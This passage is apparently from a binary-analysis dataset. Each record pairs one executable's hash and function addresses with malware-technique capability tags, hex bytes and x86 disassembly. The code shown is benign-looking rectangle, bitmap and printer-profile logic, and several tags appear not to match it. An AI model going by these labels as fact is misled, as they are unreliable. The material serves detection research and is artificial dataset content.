"mov dword [esp + 0x30], eax",
"mov edx, dword [esp + 0x34]",
"lea ecx, [edi - 1]",
"push ebp",
"push ecx",
"push edi",
"push edx",
"push ebx",
"mov ecx, esi",
"call fcn.0043abb0",
"mov eax, dword [esp + 0x30]",
"inc ebx",
"add ebp, 4",
"add edi, 4",
"dec eax",
"mov dword [esp + 0x30], eax",
"jne 0x43ab31",
"mov eax, dword [esp + 0x10]",
"mov edx, dword [esp + 0x24]",
"mov ecx, dword [esp + 0x38]",
"shl eax, 2",
"add edx, eax",
"mov eax, dword [esp + 0x28]",
"inc ecx",
"dec eax",
"mov dword [esp + 0x24], edx",
"mov dword [esp + 0x38], ecx",
"mov dword [esp + 0x28], eax",
"jne 0x43ab18",
"pop edi",
"pop esi",
"pop ebp",
"mov eax, 1",
"pop ebx",
"add esp, 0x10",
"ret 0x18"
] |
f53a5abe6cd77afda63f23dd6f0e75472256e1f40737ab4e61eea0208fed039d
|
0x43af00
|
[
"Resolve function by parsing pe exports"
] |
83ec688b442478535683f80157894c24140f8c0a02000083f8080f8f0102000083bc248c000000020f8cf30100008b44247c8b308b78048b4808894c246c2bce8b580c894c247c85c9895c24700f8ece0100002bdf85db895c24200f8ec00100008b84248000000085c0741b8b10895424448b5004895424488b50088954244c8b400c8944245033d25585dbc744241c01000000895424140f8e6c0100008b2dd8f54b008bc3c7442410320000002bc283f8327f048944241033c085c90f8e2e0100008b5c241003da895c24202bc883f9327e05b9320000008d1c018b4c24205153528d5424345052ff15c8f54b00578d44242c5650ffd58b84248400000085c074158d4c24488d542428518d44242c5250ff15ccf54b008d4c242851ff150cf64b0085c00f85ad0000008b44242c8b5424288b4c24308944243c895424388b542434894c24408bc78bce89542444f7d8f7d9508d54243c5152ffd58b5424408b4424388b4c243c895424608d542458894424588b442444528b942494000000894c24608b4c2478894424688b442474528b9424940000002bcf2bc652518b4c2428508b84249c00000050e860f4ffff83f801754d8b8c24940000008b54242c8b442428518b8c24800000005250518b4c2428e8e8fcffff8b8c24800000008b5424148bc33bc10f8ce0feffff8b5c2424035424103bd3895424147d0de9a2feffffc744241c000000008b4c2418e8fdefffff8b44241c5d5f5e5b83c468c21c005f5e33c05b83c468c21c00
|
[
"sub esp, 0x68",
"mov eax, dword [esp + 0x78]",
"push ebx",
"push esi",
"cmp eax, 1",
"push edi",
"mov dword [esp + 0x14], ecx",
"jl 0x43b121",
"cmp eax, 8",
"jg 0x43b121",
"cmp dword [esp + 0x8c], 2",
"jl 0x43b121",
"mov eax, dword [esp + 0x7c]",
"mov esi, dword [eax]",
"mov edi, dword [eax + 4]",
"mov ecx, dword [eax + 8]",
"mov dword [esp + 0x6c], ecx",
"sub ecx, esi",
"mov ebx, dword [eax + 0xc]",
"mov dword [esp + 0x7c], ecx",
"test ecx, ecx",
"mov dword [esp + 0x70], ebx",
"jle 0x43b121",
"sub ebx, edi",
"test ebx, ebx",
"mov dword [esp + 0x20], ebx",
"jle 0x43b121",
"mov eax, dword [esp + 0x80]",
"test eax, eax",
"je 0x43af87",
"mov edx, dword [eax]",
"mov dword [esp + 0x44], edx",
"mov edx, dword [eax + 4]",
"mov dword [esp + 0x48], edx",
"mov edx, dword [eax + 8]",
"mov dword [esp + 0x4c], edx",
"mov eax, dword [eax + 0xc]",
"mov dword [esp + 0x50], eax",
"xor edx, edx",
"push ebp",
"test ebx, ebx",
"mov dword [esp + 0x1c], 1",
"mov dword [esp + 0x14], edx",
"jle 0x43b10a",
"mov ebp, dword [sym.imp.USER32.dll_OffsetRect]",
"mov eax, ebx",
"mov dword [esp + 0x10], 0x32",
"sub eax, edx",
"cmp eax, 0x32",
"jg 0x43afb9",
"mov dword [esp + 0x10], eax",
"xor eax, eax",
"test ecx, ecx",
"jle 0x43b0f1",
"mov ebx, dword [esp + 0x10]",
"add ebx, edx",
"mov dword [esp + 0x20], ebx",
"sub ecx, eax",
"cmp ecx, 0x32",
"jle 0x43afd9",
"mov ecx, 0x32",
"lea ebx, [ecx + eax]",
"mov ecx, dword [esp + 0x20]",
"push ecx",
"push ebx",
"push edx",
"lea edx, [esp + 0x34]",
"push eax",
"push edx",
"call dword [sym.imp.USER32.dll_SetRect]",
"push edi",
"lea eax, [esp + 0x2c]",
"push esi",
"push eax",
"call ebp",
"mov eax, dword [esp + 0x84]",
"test eax, eax",
"je 0x43b018",
"lea ecx, [esp + 0x48]",
"lea edx, [esp + 0x28]",
"push ecx",
"lea eax, [esp + 0x2c]",
"push edx",
"push eax",
"call dword [sym.imp.USER32.dll_IntersectRect]",
"lea ecx, [esp + 0x28]",
"push ecx",
"call dword [sym.imp.USER32.dll_IsRectEmpty]",
"test eax, eax",
"jne 0x43b0d8",
"mov eax, dword [esp + 0x2c]",
"mov edx, dword [esp + 0x28]",
"mov ecx, dword [esp + 0x30]",
"mov dword [esp + 0x3c], eax",
"mov dword [esp + 0x38], edx",
"mov edx, dword [esp + 0x34]",
"mov dword [esp + 0x40], ecx",
"mov eax, edi",
"mov ecx, esi",
"mov dword [esp + 0x44], edx",
"neg eax",
"neg ecx",
"push eax",
"lea edx, [esp + 0x3c]",
"push ecx",
"push edx",
"call ebp",
"mov edx, dword [esp + 0x40]",
"mov eax, dword [esp + 0x38]",
"mov ecx, dword [esp + 0x3c]",
"mov dword [esp + 0x60], edx",
"lea edx, [esp + 0x58]",
"mov dword [esp + 0x58], eax",
"mov eax, dword [esp + 0x44]",
"push edx",
"mov edx, dword [esp + 0x94]",
"mov dword [esp + 0x60], ecx",
"mov ecx, dword [esp + 0x78]",
"mov dword [esp + 0x68], eax",
"mov eax, dword [esp + 0x74]",
"push edx",
"mov edx, dword [esp + 0x94]",
"sub ecx, edi",
"sub eax, esi",
"push edx",
"push ecx",
"mov ecx, dword [esp + 0x28]",
"push eax",
"mov eax, dword [esp + 0x9c]",
"push eax",
"call fcn.0043a510",
"cmp eax, 1",
"jne 0x43b102",
"mov ecx, dword [esp + 0x94]",
"mov edx, dword [esp + 0x2c]",
"mov eax, dword [esp + 0x28]",
"push ecx",
"mov ecx, dword [esp + 0x80]",
"push edx",
"push eax",
"push ecx",
"mov ecx, dword [esp + 0x28]",
"call fcn.0043adc0",
"mov ecx, dword [esp + 0x80]",
"mov edx, dword [esp + 0x14]",
"mov eax, ebx",
"cmp eax, ecx",
"jl 0x43afcd",
"mov ebx, dword [esp + 0x24]",
"add edx, dword [esp + 0x10]",
"cmp edx, ebx",
"mov dword [esp + 0x14], edx",
"jge 0x43b10a",
"jmp 0x43afa4",
"mov dword [esp + 0x1c], 0",
"mov ecx, dword [esp + 0x18]",
"call fcn.0043a110",
"mov eax, dword [esp + 0x1c]",
"pop ebp",
"pop edi",
"pop esi",
"pop ebx",
"add esp, 0x68",
"ret 0x1c",
"pop edi",
"pop esi",
"xor eax, eax",
"pop ebx",
"add esp, 0x68",
"ret 0x1c"
] |
f53a5abe6cd77afda63f23dd6f0e75472256e1f40737ab4e61eea0208fed039d
|
0x43d6a0
|
[
"Enumerate pe sections"
] |
83ec188b44241c53555633f633c9668b7008668b480433ed33d2668b680a668b50062bf12bea4633db453bf3897424140f8e620100003beb0f8e5a0100008bc6579983e20703c28bf88bc6c1ff032507000080897c241079054883c8f840740547897c24108bcf81e10100008079054983c9fe41740547897c24106a18e813f1060083c4043bc37413891889580489580889580c8958108958148bd88bc7895c24140fafc550c70307000000897304896b08894314e8dbf006008b4b148bf88bd133c0c1e902897b1083c404f3ab8bca83e103f3aa8b44242c85ed8d90800000000f8ea700000033c0896c24208944241c8b6b1033c903e8894c242c85f67e758a023cc0765b25ff0000002dc0000000428bf08954242483fe017e3a33c08bce8a028bd18ad88bfd8afb4e8bc3c1e010668bc38b5c2414c1e902f3ab8bca8b54242483e10303eef3aa8b44242c8d0cf08b742418eb0e8a028b742418884500eb038845004583c108423bce894c242c7c8f8b44241c8b7c24108b4c242003c7498944241c894c24200f8563ffffff5f5e8bc35d5b83c418c35e5d33c05b83c418c3
|
[
"sub esp, 0x18",
"mov eax, dword [esp + 0x1c]",
"push ebx",
"push ebp",
"push esi",
"xor esi, esi",
"xor ecx, ecx",
"mov si, word [eax + 8]",
"mov cx, word [eax + 4]",
"xor ebp, ebp",
"xor edx, edx",
"mov bp, word [eax + 0xa]",
"mov dx, word [eax + 6]",
"sub esi, ecx",
"sub ebp, edx",
"inc esi",
"xor ebx, ebx",
"inc ebp",
"cmp esi, ebx",
"mov dword [esp + 0x14], esi",
"jle 0x43d838",
"cmp ebp, ebx",
"jle 0x43d838",
"mov eax, esi",
"push edi",
"cdq",
"and edx, 7",
"add eax, edx",
"mov edi, eax",
"mov eax, esi",
"sar edi, 3",
"and eax, 0x80000007",
"mov dword [esp + 0x10], edi",
"jns 0x43d6fe",
"dec eax",
"or eax, 0xfffffff8",
"inc eax",
"je 0x43d705",
"inc edi",
"mov dword [esp + 0x10], edi",
"mov ecx, edi",
"and ecx, reloc.WS2_32.dll_accept",
"jns 0x43d714",
"dec ecx",
"or ecx, 0xfffffffe",
"inc ecx",
"je 0x43d71b",
"inc edi",
"mov dword [esp + 0x10], edi",
"push 0x18",
"call fcn.004ac835",
"add esp, 4",
"cmp eax, ebx",
"je 0x43d73c",
"mov dword [eax], ebx",
"mov dword [eax + 4], ebx",
"mov dword [eax + 8], ebx",
"mov dword [eax + 0xc], ebx",
"mov dword [eax + 0x10], ebx",
"mov dword [eax + 0x14], ebx",
"mov ebx, eax",
"mov eax, edi",
"mov dword [esp + 0x14], ebx",
"imul eax, ebp",
"push eax",
"mov dword [ebx], 7",
"mov dword [ebx + 4], esi",
"mov dword [ebx + 8], ebp",
"mov dword [ebx + 0x14], eax",
"call fcn.004ac835",
"mov ecx, dword [ebx + 0x14]",
"mov edi, eax",
"mov edx, ecx",
"xor eax, eax",
"shr ecx, 2",
"mov dword [ebx + 0x10], edi",
"add esp, 4",
"rep stosd dword es:[edi], eax",
"mov ecx, edx",
"and ecx, 3",
"rep stosb byte es:[edi], al",
"mov eax, dword [esp + 0x2c]",
"test ebp, ebp",
"lea edx, [eax + 0x80]",
"jle 0x43d82e",
"xor eax, eax",
"mov dword [esp + 0x20], ebp",
"mov dword [esp + 0x1c], eax",
"mov ebp, dword [ebx + 0x10]",
"xor ecx, ecx",
"add ebp, eax",
"mov dword [esp + 0x2c], ecx",
"test esi, esi",
"jle 0x43d815",
"mov al, byte [edx]",
"cmp al, 0xc0",
"jbe 0x43d801",
"and eax, 0xff",
"sub eax, 0xc0",
"inc edx",
"mov esi, eax",
"mov dword [esp + 0x24], edx",
"cmp esi, 1",
"jle 0x43d7f6",
"xor eax, eax",
"mov ecx, esi",
"mov al, byte [edx]",
"mov edx, ecx",
"mov bl, al",
"mov edi, ebp",
"mov bh, bl",
"dec esi",
"mov eax, ebx",
"shl eax, 0x10",
"mov ax, bx",
"mov ebx, dword [esp + 0x14]",
"shr ecx, 2",
"rep stosd dword es:[edi], eax",
"mov ecx, edx",
"mov edx, dword [esp + 0x24]",
"and ecx, 3",
"add ebp, esi",
"rep stosb byte es:[edi], al",
"mov eax, dword [esp + 0x2c]",
"lea ecx, [eax + esi*8]",
"mov esi, dword [esp + 0x18]",
"jmp 0x43d804",
"mov al, byte [edx]",
"mov esi, dword [esp + 0x18]",
"mov byte [ebp], al",
"jmp 0x43d804",
"mov byte [ebp], al",
"inc ebp",
"add ecx, 8",
"inc edx",
"cmp ecx, esi",
"mov dword [esp + 0x2c], ecx",
"jl 0x43d7a0",
"mov eax, dword [esp + 0x1c]",
"mov edi, dword [esp + 0x10]",
"mov ecx, dword [esp + 0x20]",
"add eax, edi",
"dec ecx",
"mov dword [esp + 0x1c], eax",
"mov dword [esp + 0x20], ecx",
"jne 0x43d791",
"pop edi",
"pop esi",
"mov eax, ebx",
"pop ebp",
"pop ebx",
"add esp, 0x18",
"ret",
"pop esi",
"pop ebp",
"xor eax, eax",
"pop ebx",
"add esp, 0x18",
"ret"
] |
f53a5abe6cd77afda63f23dd6f0e75472256e1f40737ab4e61eea0208fed039d
|
0x440c30
|
[
"Access peb ldr_data"
] |
64a1000000006aff6838a84b00506489250000000083ec2856578b7c24448bf185ff75155f33c05e8b4c242864890d0000000083c434c2240068000400008d4c240ce8713507008b4424406a0057508d4c2414c744244400000000e8a43507008b4c24608b54245c8b442458518b4c2458528b542458508b442458518b4c245852508d54242051528bcee8310000008d4c24088bf0c7442438ffffffffe89f3507008b4c24308bc65f5e64890d0000000083c434c22400
|
[
"mov eax, dword fs:[0]",
"push 0xffffffffffffffff",
"push 0x4ba838",
"push eax",
"mov dword fs:[0], esp",
"sub esp, 0x28",
"push esi",
"push edi",
"mov edi, dword [esp + 0x44]",
"mov esi, ecx",
"test edi, edi",
"jne 0x440c69",
"pop edi",
"xor eax, eax",
"pop esi",
"mov ecx, dword [esp + 0x28]",
"mov dword fs:[0], ecx",
"add esp, 0x34",
"ret 0x24",
"push 0x400",
"lea ecx, [esp + 0xc]",
"call fcn.004b41e8",
"mov eax, dword [esp + 0x40]",
"push 0",
"push edi",
"push eax",
"lea ecx, [esp + 0x14]",
"mov dword [esp + 0x44], 0",
"call fcn.004b4234",
"mov ecx, dword [esp + 0x60]",
"mov edx, dword [esp + 0x5c]",
"mov eax, dword [esp + 0x58]",
"push ecx",
"mov ecx, dword [esp + 0x58]",
"push edx",
"mov edx, dword [esp + 0x58]",
"push eax",
"mov eax, dword [esp + 0x58]",
"push ecx",
"mov ecx, dword [esp + 0x58]",
"push edx",
"push eax",
"lea edx, [esp + 0x20]",
"push ecx",
"push edx",
"mov ecx, esi",
"call fcn.00440cf0",
"lea ecx, [esp + 8]",
"mov esi, eax",
"mov dword [esp + 0x38], 0xffffffff",
"call fcn.004b4271",
"mov ecx, dword [esp + 0x30]",
"mov eax, esi",
"pop edi",
"pop esi",
"mov dword fs:[0], ecx",
"add esp, 0x34",
"ret 0x24"
] |
f53a5abe6cd77afda63f23dd6f0e75472256e1f40737ab4e61eea0208fed039d
|
0x4412ab
|
[
"Contain obfuscated stackstrings"
] |
64a1000000006aff68dbaa4b00506489250000000081ec34060000568bf18b4e0c85c90f84ad0400008b0157ff505c6a008d4c240c8bf8e87483010085ffc784244406000000000000740d578d8c24cc050000e8081400008d4c2408e8b7c8060083f8015f0f840d0200008d8c2424060000c784244006000019000000e863a806008d8c24c4050000c684244006000018e8aa1200008d8c2488050000c684244006000017e8a93907008d8c244c050000c684244006000016e8953907008d8c2410050000c684244006000015e8cd3707008d8c24d4040000c684244006000014e8b93707008d8c2498040000c684244006000013e8a53707008d8c245c040000c684244006000012e83a3807008d8c2420040000c684244006000011e87d3707008d8c24e4030000c684244006000010e81d3907008d8c24a8030000c68424400600000fe8093907008d8c246c030000c68424400600000ee8f53807008d8c2430030000c68424400600000de8e13807008d8c24f4020000c68424400600000ce8cd3807008d8c24b8020000c68424400600000be8b93807008d8c247c020000c68424400600000ae89a3707008d8c2440020000c684244006000009e8913807008d8c2404020000c684244006000008e872370700c6842440060000078d8c24c8010000e8693807008d8c248c010000c684244006000006e8553807008d8c2450010000c684244006000005e88d3607008d8c2414010000c684244006000004e81f3607008d8c24d8000000c684244006000003e80b3607008d8c249c000000c684244006000002e8513607008d4c2460c684244006000001e8403607008d4c2404c7842440060000ffffffffe883c30600e95e0200008b4e0c8d8424c4050000508b11ff526083f8010f85310200008b166a006a006a0c508bceff52048d8c2424060000c784244006000032000000e82fa606008d8c24c4050000c684244006000031e8761000008d8c2488050000c684244006000030e8753707008d8c244c050000c68424400600002fe8613707008d8c2410050000c68424400600002ee8993507008d8c24d4040000c68424400600002de8853507008d8c2498040000c68424400600002ce8713507008d8c245c040000c68424400600002be8063607008d8c2420040000c68424400600002ae8493507008d8c24e4030000c684244006000029e8e93607008d8c24a8030000c684244006000028e8d53607008d8c246c030000c684244006000027e8c13607008d8c2430030000c684244006000026e8ad3607008d8c24f4020000c684244006000025e8993607008d8c24b8020000c684244006000024e8853607008d8c247c020000c684244006000023e866350700c6842440060000228d8c2440020000e85d3607008d8c2404020000c684244006000021e83e3507008d8c24c8010000c684244006000020e8353607008d8c248c010000c68424400600001fe8213607008d8c2450010000c68424400600001ee8593407008d8c2414010000c68424400600001de8eb3307008d8c24d8000000c68424400600001ce8d73307008d8c249c000000c68424400600001be81d3407008d4c2460c68424400600001ae80c3407008d4c2404c7842440060000ffffffffe84fc10600b8010000005e8b8c243406000064890d0000000081c440060000c38d4c2404c7842440060000ffffffffe81a0000008b8c243806000033c05e64890d0000000081c440060000c3
|
[
"mov eax, dword fs:[0]",
"push 0xffffffffffffffff",
"push 0x4baadb",
"push eax",
"mov dword fs:[0], esp",
"sub esp, 0x634",
"push esi",
"mov esi, ecx",
"mov ecx, dword [esi + 0xc]",
"test ecx, ecx",
"je 0x441766",
"mov eax, dword [ecx]",
"push edi",
"call dword [eax + 0x5c]",
"push 0",
"lea ecx, [esp + 0xc]",
"mov edi, eax",
"call fcn.00459640",
"test edi, edi",
"mov dword [esp + 0x644], 0",
"je 0x4412e8",
"push edi",
"lea ecx, [esp + 0x5cc]",
"call fcn.004426f0",
"lea ecx, [esp + 8]",
"call fcn.004adba8",
"cmp eax, 1",
"pop edi",
"je 0x441508",
"lea ecx, [esp + 0x624]",
"mov dword [esp + 0x640], 0x19",
"call fcn.004abb75",
"lea ecx, [esp + 0x5c4]",
"mov byte [esp + 0x640], 0x18",
"call fcn.004425d0",
"lea ecx, [esp + 0x588]",
"mov byte [esp + 0x640], 0x17",
"call fcn.004b4ce3",
"lea ecx, [esp + 0x54c]",
"mov byte [esp + 0x640], 0x16",
"call fcn.004b4ce3",
"lea ecx, [esp + 0x510]",
"mov byte [esp + 0x640], 0x15",
"call fcn.004b4b2f",
"lea ecx, [esp + 0x4d4]",
"mov byte [esp + 0x640], 0x14",
"call fcn.004b4b2f",
"lea ecx, [esp + 0x498]",
"mov byte [esp + 0x640], 0x13",
"call fcn.004b4b2f",
"lea ecx, [esp + 0x45c]",
"mov byte [esp + 0x640], 0x12",
"call fcn.004b4bd8",
"lea ecx, [esp + 0x420]",
"mov byte [esp + 0x640], 0x11",
"call fcn.004b4b2f",
"lea ecx, [esp + 0x3e4]",
"mov byte [esp + 0x640], 0x10",
"call fcn.004b4ce3",
"lea ecx, [esp + 0x3a8]",
"mov byte [esp + 0x640], 0xf",
"call fcn.004b4ce3",
"lea ecx, [esp + 0x36c]",
"mov byte [esp + 0x640], 0xe",
"call fcn.004b4ce3",
"lea ecx, [esp + 0x330]",
"mov byte [esp + 0x640], 0xd",
"call fcn.004b4ce3",
"lea ecx, [esp + 0x2f4]",
"mov byte [esp + 0x640], 0xc",
"call fcn.004b4ce3",
"lea ecx, [esp + 0x2b8]",
"mov byte [esp + 0x640], 0xb",
"call fcn.004b4ce3",
"lea ecx, [esp + 0x27c]",
"mov byte [esp + 0x640], 0xa",
"call fcn.004b4bd8",
"lea ecx, [esp + 0x240]",
"mov byte [esp + 0x640], 9",
"call fcn.004b4ce3",
"lea ecx, [esp + 0x204]",
"mov byte [esp + 0x640], 8",
"call fcn.004b4bd8",
"mov byte [esp + 0x640], 7",
"lea ecx, [esp + 0x1c8]",
"call fcn.004b4ce3",
"lea ecx, [esp + 0x18c]",
"mov byte [esp + 0x640], 6",
"call fcn.004b4ce3",
"lea ecx, [esp + 0x150]",
"mov byte [esp + 0x640], 5",
"call fcn.004b4b2f",
"lea ecx, [esp + 0x114]",
"mov byte [esp + 0x640], 4",
"call fcn.004b4ad5",
"lea ecx, [esp + 0xd8]",
"mov byte [esp + 0x640], 3",
"call fcn.004b4ad5",
"lea ecx, [esp + 0x9c]",
"mov byte [esp + 0x640], 2",
"call fcn.004b4b2f",
"lea ecx, [esp + 0x60]",
"mov byte [esp + 0x640], 1",
"call fcn.004b4b2f",
"lea ecx, [esp + 4]",
"mov dword [esp + 0x640], 0xffffffff",
"call fcn.004ad886",
"jmp 0x441766",
"mov ecx, dword [esi + 0xc]",
"lea eax, [esp + 0x5c4]",
"push eax",
"mov edx, dword [ecx]",
"call dword [edx + 0x60]",
"cmp eax, 1",
"jne 0x441752",
"mov edx, dword [esi]",
"push 0",
"push 0",
"push 0xc",
"push eax",
"mov ecx, esi",
"call dword [edx + 4]",
"lea ecx, [esp + 0x624]",
"mov dword [esp + 0x640], 0x32",
"call fcn.004abb75",
"lea ecx, [esp + 0x5c4]",
"mov byte [esp + 0x640], 0x31",
"call fcn.004425d0",
"lea ecx, [esp + 0x588]",
"mov byte [esp + 0x640], 0x30",
"call fcn.004b4ce3",
"lea ecx, [esp + 0x54c]",
"mov byte [esp + 0x640], 0x2f",
"call fcn.004b4ce3",
"lea ecx, [esp + 0x510]",
"mov byte [esp + 0x640], 0x2e",
"call fcn.004b4b2f",
"lea ecx, [esp + 0x4d4]",
"mov byte [esp + 0x640], 0x2d",
"call fcn.004b4b2f",
"lea ecx, [esp + 0x498]",
"mov byte [esp + 0x640], 0x2c",
"call fcn.004b4b2f",
"lea ecx, [esp + 0x45c]",
"mov byte [esp + 0x640], 0x2b",
"call fcn.004b4bd8",
"lea ecx, [esp + 0x420]",
"mov byte [esp + 0x640], 0x2a",
"call fcn.004b4b2f",
"lea ecx, [esp + 0x3e4]",
"mov byte [esp + 0x640], 0x29",
"call fcn.004b4ce3",
"lea ecx, [esp + 0x3a8]",
"mov byte [esp + 0x640], 0x28",
"call fcn.004b4ce3",
"lea ecx, [esp + 0x36c]",
"mov byte [esp + 0x640], 0x27",
"call fcn.004b4ce3",
"lea ecx, [esp + 0x330]",
"mov byte [esp + 0x640], 0x26",
"call fcn.004b4ce3",
"lea ecx, [esp + 0x2f4]",
"mov byte [esp + 0x640], 0x25",
"call fcn.004b4ce3",
"lea ecx, [esp + 0x2b8]",
"mov byte [esp + 0x640], 0x24",
"call fcn.004b4ce3",
"lea ecx, [esp + 0x27c]",
"mov byte [esp + 0x640], 0x23",
"call fcn.004b4bd8",
"mov byte [esp + 0x640], 0x22",
"lea ecx, [esp + 0x240]",
"call fcn.004b4ce3",
"lea ecx, [esp + 0x204]",
"mov byte [esp + 0x640], 0x21",
"call fcn.004b4bd8",
"lea ecx, [esp + 0x1c8]",
"mov byte [esp + 0x640], 0x20",
"call fcn.004b4ce3",
"lea ecx, [esp + 0x18c]",
"mov byte [esp + 0x640], 0x1f",
"call fcn.004b4ce3",
"lea ecx, [esp + 0x150]",
"mov byte [esp + 0x640], 0x1e",
"call fcn.004b4b2f",
"lea ecx, [esp + 0x114]",
"mov byte [esp + 0x640], 0x1d",
"call fcn.004b4ad5",
"lea ecx, [esp + 0xd8]",
"mov byte [esp + 0x640], 0x1c",
"call fcn.004b4ad5",
"lea ecx, [esp + 0x9c]",
"mov byte [esp + 0x640], 0x1b",
"call fcn.004b4b2f",
"lea ecx, [esp + 0x60]",
"mov byte [esp + 0x640], 0x1a",
"call fcn.004b4b2f",
"lea ecx, [esp + 4]",
"mov dword [esp + 0x640], 0xffffffff",
"call fcn.004ad886",
"mov eax, 1",
"pop esi",
"mov ecx, dword [esp + 0x634]",
"mov dword fs:[0], ecx",
"add esp, 0x640",
"ret",
"lea ecx, [esp + 4]",
"mov dword [esp + 0x640], 0xffffffff",
"call fcn.00441780",
"mov ecx, dword [esp + 0x638]",
"xor eax, eax",
"pop esi",
"mov dword fs:[0], ecx",
"add esp, 0x640",
"ret"
] |
f53a5abe6cd77afda63f23dd6f0e75472256e1f40737ab4e61eea0208fed039d
|
0x441960
|
[
"Resolve function by parsing pe exports"
] |
6aff64a1000000006892ac4b0050b81814000064892500000000e8518904005355568bf1578b460c85c0750733c0e9ad0300008d4c2478e8c40b00008b4e0cc7842430140000000000008b01ff505c85c0740a508d4c247ce8330d00008b1d00f34b008d8c243402000068f40100005168c0e34f0068b8e34f0068b0e34f00ffd38d942434020000683c524f0052e88b94040083c408894424208d8424280400006800100000506824b250006a0068a8e34f00ffd38b0dcc62500083c8ff8db42428040000894424188944241c894c24108d4c2428c684243014000001e800a106008d4c2450c684243014000002e8efa006008d4c243cc684243014000003e8dea00600c6842430140000048bfe83c9ff33c0f2aef7d149894c24240f84dc0000008d9424d800000068c80000005268c0e34f005668a8e34f00ffd38d8424d8000000683c524f0050e8d09304008bf883c40885ff0f8490000000683c524f006a00e8b79304008be883c40885ed747b68a0e34f0055e8759f040083c40885c074698b44243056508d4c24308bd8e82ba206008b4c245857518d4c2458e81ca206008b54244455528d4c2444e80da206008b44242085c074125056e8309f040083c40885c07504895c24188b8424b40000008b48f885c974125056e8109f040083c40885c07504895c241c8b4424248b1d00f34b008d740601e90effffff8b5c241c83fbff750d8b4424188bd843f7db1bdb23d88b4c2430493bd97e5f8d4c243cc684243014000003e8e79f06008d4c2450c684243014000002e8d69f06008d4c2428c684243014000001e8c59f06008d4c2410c684243014000000e833af06008d4c2478c7842430140000ffffffffe8fb09000033c0e9640100008b54242c8d4c24108d049a50e8f4af06008b54241033f68d4c2414565152e8e95a050083f8010f85de0000008b4c24108b542414568d8424a40100005650515256e8c05a05008d4c24648bf8e8f316fdff578d4c2468c684243414000005e80117fdff8be88b8424c80000003bc775238bb424c00000008bcff7d81bc08bfd23c68bf08bc1c1e902f3a58bc883e103f3a4eb1e8b4c24108b5424146a026a005551526a00e85d5a05008b45280c03894528668b8424cc000000556689452e668b8c24d200000066894d2c8b5424448b4c24588b049a8b5424148b1c99505253ff15acf04b008bf08b44241450e80f5a05008d4c2464c684243014000004c7442464a8cf4d00e83a18fdff8d4c243cc684243014000003e87e9e06008d4c2450c684243014000002e86d9e06008d4c2428c684243014000001e85c9e06008d4c2410c684243014000000e8caad06008d4c2478c7842430140000ffffffffe8920800008bc68b8c24281400005f5e5d5b64890d0000000081c424140000c3
|
[
"push 0xffffffffffffffff",
"mov eax, dword fs:[0]",
"push 0x4bac92",
"push eax",
"mov eax, 0x1418",
"mov dword fs:[0], esp",
"call fcn.0048a2d0",
"push ebx",
"push ebp",
"push esi",
"mov esi, ecx",
"push edi",
"mov eax, dword [esi + 0xc]",
"test eax, eax",
"jne 0x441993",
"xor eax, eax",
"jmp 0x441d40",
"lea ecx, [esp + 0x78]",
"call fcn.00442560",
"mov ecx, dword [esi + 0xc]",
"mov dword [esp + 0x1430], 0",
"mov eax, dword [ecx]",
"call dword [eax + 0x5c]",
"test eax, eax",
"je 0x4419bd",
"push eax",
"lea ecx, [esp + 0x7c]",
"call fcn.004426f0",
"mov ebx, dword [sym.imp.KERNEL32.dll_GetProfileStringA]",
"lea ecx, [esp + 0x234]",
"push 0x1f4",
"push ecx",
"push 0x4fe3c0",
"push str.device",
"push str.windows",
"call ebx",
"lea edx, [esp + 0x234]",
"push 0x4f523c",
"push edx",
"call fcn.0048ae7e",
"add esp, 8",
"mov dword [esp + 0x20], eax",
"lea eax, [esp + 0x428]",
"push 0x1000",
"push eax",
"push 0x50b224",
"push 0",
"push str.devices",
"call ebx",
"mov ecx, dword [0x5062cc]",
"or eax, 0xffffffff",
"lea esi, [esp + 0x428]",
"mov dword [esp + 0x18], eax",
"mov dword [esp + 0x1c], eax",
"mov dword [esp + 0x10], ecx",
"lea ecx, [esp + 0x28]",
"mov byte [esp + 0x1430], 1",
"call fcn.004abb42",
"lea ecx, [esp + 0x50]",
"mov byte [esp + 0x1430], 2",
"call fcn.004abb42",
"lea ecx, [esp + 0x3c]",
"mov byte [esp + 0x1430], 3",
"call fcn.004abb42",
"mov byte [esp + 0x1430], 4",
"mov edi, esi",
"or ecx, 0xffffffff",
"xor eax, eax",
"repne scasb al, byte es:[edi]",
"not ecx",
"dec ecx",
"mov dword [esp + 0x24], ecx",
"je 0x441b5e",
"lea edx, [esp + 0xd8]",
"push 0xc8",
"push edx",
"push 0x4fe3c0",
"push esi",
"push str.devices",
"call ebx",
"lea eax, [esp + 0xd8]",
"push 0x4f523c",
"push eax",
"call fcn.0048ae7e",
"mov edi, eax",
"add esp, 8",
"test edi, edi",
"je 0x441b4b",
"push 0x4f523c",
"push 0",
"call fcn.0048ae7e",
"mov ebp, eax",
"add esp, 8",
"test ebp, ebp",
"je 0x441b4b",
"push str.none",
"push ebp",
"call fcn.0048ba50",
"add esp, 8",
"test eax, eax",
"je 0x441b4b",
"mov eax, dword [esp + 0x30]",
"push esi",
"push eax",
"lea ecx, [esp + 0x30]",
"mov ebx, eax",
"call fcn.004abd1e",
"mov ecx, dword [esp + 0x58]",
"push edi",
"push ecx",
"lea ecx, [esp + 0x58]",
"call fcn.004abd1e",
"mov edx, dword [esp + 0x44]",
"push ebp",
"push edx",
"lea ecx, [esp + 0x44]",
"call fcn.004abd1e",
"mov eax, dword [esp + 0x20]",
"test eax, eax",
"je 0x441b2b",
"push eax",
"push esi",
"call fcn.0048ba50",
"add esp, 8",
"test eax, eax",
"jne 0x441b2b",
"mov dword [esp + 0x18], ebx",
"mov eax, dword [esp + 0xb4]",
"mov ecx, dword [eax - 8]",
"test ecx, ecx",
"je 0x441b4b",
"push eax",
"push esi",
"call fcn.0048ba50",
"add esp, 8",
"test eax, eax",
"jne 0x441b4b",
"mov dword [esp + 0x1c], ebx",
"mov eax, dword [esp + 0x24]",
"mov ebx, dword [sym.imp.KERNEL32.dll_GetProfileStringA]",
"lea esi, [esi + eax + 1]",
"jmp 0x441a6c",
"mov ebx, dword [esp + 0x1c]",
"cmp ebx, 0xffffffff",
"jne 0x441b74",
"mov eax, dword [esp + 0x18]",
"mov ebx, eax",
"inc ebx",
"neg ebx",
"sbb ebx, ebx",
"and ebx, eax",
"mov ecx, dword [esp + 0x30]",
"dec ecx",
"cmp ebx, ecx",
"jle 0x441bdc",
"lea ecx, [esp + 0x3c]",
"mov byte [esp + 0x1430], 3",
"call fcn.004abb75",
"lea ecx, [esp + 0x50]",
"mov byte [esp + 0x1430], 2",
"call fcn.004abb75",
"lea ecx, [esp + 0x28]",
